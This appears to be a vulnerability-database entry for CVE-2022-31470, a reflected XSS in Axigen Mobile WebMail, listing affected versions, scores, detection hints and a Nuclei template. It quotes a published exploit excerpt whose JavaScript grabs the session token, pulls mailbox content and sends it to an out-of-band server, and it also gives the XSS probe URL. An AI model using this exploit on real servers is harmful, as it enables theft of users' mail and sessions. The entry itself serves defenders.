CVE-2022-31470
Published: 2022-06-07
Priority: P3 · medium · CVSS 3.1 base score 6.1
Exploit available: yes
EPSS: 52.09% (98.8th percentile)
An XSS vulnerability in the index_mobile_changepass.hsp reset-password section of Axigen Mobile WebMail before 10.2.3.12 and 10.3.x before 10.3.3.47 allows attackers to run arbitrary Javascript code that, using an active end-user session (for a logged-in user), can access and retrieve mailbox content.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| axigen | axigen_mobile_webmail | >= 10.2.2.0 < 10.2.3.12 | 10.2.3.12 |
| axigen | axigen_mobile_webmail | >= 10.3.3.0 < 10.3.3.47 | 10.3.3.47 |
Detection & IOCs (extracted from sources)

Nuclei template header:

```yaml
id: CVE-2022-31470
info:
  name: Axigen WebMail - Cross-Site Scripting
  author: AmirZargham
  severity: medium
```
- Detect XSS probes against Axigen WebMail by looking for the reflected payload 'alert(document.domain)' in HTTP responses to requests targeting /index.hsp with the 'm' parameter.
- Fingerprint Axigen WebMail instances via Shodan/FOFA using the title 'Axigen' before probing for the vulnerability.
- Confirm Axigen WebMail presence by checking the HTTP response body for the strings 'Axigen WebMail', 'AXI-SCRIPT', 'axigen-web-fonts', or 'AXIWMRememberLogin' before exploitation.
- Exfiltration of mailbox content is performed by appending a dynamically created script tag whose src points to an out-of-band server, with base64-encoded email data as a query parameter.
- The nuclei template uses a two-step flow: first confirm the Axigen WebMail login page, then send the XSS probe to /index.hsp?m=<script>alert(document.domain)</script> and check for reflection in a text/html 200 response.
- The vulnerability affects Axigen Mobile WebMail before 10.2.3.12 and 10.3.x before 10.3.3.47; the nuclei template also references versions up to 10.5.0-4370c946, suggesting a broader affected range than the original NVD advisory.
- The exploit requires an active authenticated end-user session to access and retrieve mailbox content; unauthenticated exploitation is limited to reflected XSS delivery.
- The exploit code references an external out-of-band (OOB) server variable '${oob_server}' for data exfiltration; defenders should monitor for unusual outbound script-tag src requests from webmail sessions.
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
No detection rules found.
Exploit-DB

Axigen < 10.3.3.47 / 10.2.3.12 - Reflected XSS (exploitdb · 2023-09-08 · CVSS 6.1)
CVE-2022-31470 [MEDIUM]
Excerpt of the indexed exploit (as published, cut off at the end of the indexed text):

```javascript
Axigen {
  if (xhr1.readyState === XMLHttpRequest.DONE) {
    _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
    xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
      true);
    xhr2.setRequestHeader('Content-Type', 'application/json');
    xhr2.onreadystatechange = () => {
      if (xhr2.readyState === XMLHttpRequest.DONE) {
        if (xhr2.status === 401){
          script_tag.src =
            `${oob_server}?status=session_expired&domain=${document.domain}`;
          document.body.appendChild(script_tag);
        } else {
          resp = xhr2.responseText;
          folderId = JSON.parse(resp)["mails"][0]["folderId"];
          xhr3.open('GET',
            `/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
          xhr3.onreadystatechange = () => {
            if (xhr3.readyState === XMLHttpRequest.DONE) {
              emails = xhr3.responseText;
              script_tag.src =
                `${oob_server}?status=ok&
```
Nuclei

Axigen WebMail - Cross-Site Scripting (nuclei · CVSS 6.1)
CVE-2022-31470 [MEDIUM]
Axigen WebMail versions 10.5.0-4370c946 and older are vulnerable to reflected XSS via the m parameter in the /index.hsp endpoint.
Template (as indexed, cut off at the end of the indexed text):

```yaml
id: CVE-2022-31470
info:
  name: Axigen WebMail - Cross-Site Scripting
  author: AmirZargham
  severity: medium
  description: |
    Axigen WebMail versions 10.5.0-4370c946 and older are vulnerable to reflected XSS via the m parameter in the /index.hsp endpoint.
  impact: |
    Attackers can craft malicious URLs with JavaScript in the m parameter that executes when users access the link, potentially stealing session cookies, credentials, or performing unauthorized actions in the victim's Axigen WebMail account.
  remediation: |
    Update Axigen WebMail to a version later than 10.5.0-4370c946 that properly sanitizes and encodes the m
```
No writeups or analysis indexed.
References:

- http://packetstormsecurity.com/files/174551/Axigen-10.5.0-4370c946-Cross-Site-Scripting.html
- https://axigen.com
- https://www.axigen.com/knowledgebase/Axigen-Mobile-WebMail-XSS-Vulnerability-CVE-2022-31470-_390.html